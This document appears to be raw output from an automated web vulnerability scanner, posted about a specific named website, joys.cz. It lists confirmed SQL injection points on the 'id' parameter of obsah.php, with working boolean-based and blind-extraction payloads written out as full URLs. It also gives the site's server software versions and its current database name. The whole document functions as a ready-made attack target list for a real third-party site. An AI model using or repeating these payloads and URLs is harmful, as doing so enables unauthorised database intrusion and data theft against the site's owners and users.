joys.cz

1. Boolean Based SQL Injection
2.  
3. Severity : Critical
4. Confirmation : Confirmed
5. Detection Accuracy :
6. Vulnerable URL : http://www.joys.cz/obsah.php?lang=cz&id=-1 OR 17-7=10
7. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
8. Parameter Name: id
9. Parameter Type: Querystring
10. Attack Pattern: -1 OR 17-7=10
11.  
12. ||| [High Possibility] SQL Injection
13.  
14. Severity : Critical
15. Confirmation : Confirmed
16. Vulnerable URL : http://www.joys.cz/obsah.php?lang=cz&id=%27
17. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
18. Parameter Name: id
19. Parameter Type: Querystring
20. Attack Pattern: %27
21.  
22. ||| Database Error Message
23. Severity : Low
24. Confirmation : Confirmed
25. Vulnerable URL : http://www.joys.cz/obsah.php?lang=cz&id=%27
26. Vulnerability Classifications: PCI 6.5.6 OWASP A6 CAPEC-118 CWE-200 209
27. Parameter Name: id
28. Parameter Type: Querystring
29. Attack Pattern: %27
30.  
31. ||| MySQL Database Identified
32.  
33. Severity : Information
34. Confirmation : Confirmed
35. Vulnerable URL : http://www.joys.cz/obsah.php?lang=cz&id=-1 OR 1=1 AND 1=(SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT CONCAT(CHAR(78),CHAR(69),CHAR(84),CHAR(83),CHAR(80),CHAR(65),CHAR(82),CHAR(75),CHAR(69),CHAR(82))),5,1)),0)=88),1,2))--
36. Vulnerability Classifications: -
37. Parameter Name: id
38. Parameter Type: Querystring
39. Attack Pattern: -1 OR 1=1 AND 1=(SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT CONCAT(CHAR(78),CHAR(69),CHAR(84),CHAR(83),CHAR(80),CHAR(65),CHAR(82),CHAR(75),CHAR(69),CHAR(82))),5,1)),0)=88),1,2))--
40.  
41. ||| Injection ?
42.  
43. links> http://www.joys.cz/obsah.php?lang=cz&id=-1 OR 1=1 AND 1
44. links> http://www.joys.cz/obsah.php?lang=cz&id=-1 OR 17-7=10
45.  
46. Web Server: Apache
47. Powered-by: PHP/5.2.5
48. DB Server: MySQL
49. Current DB: db_joys_cz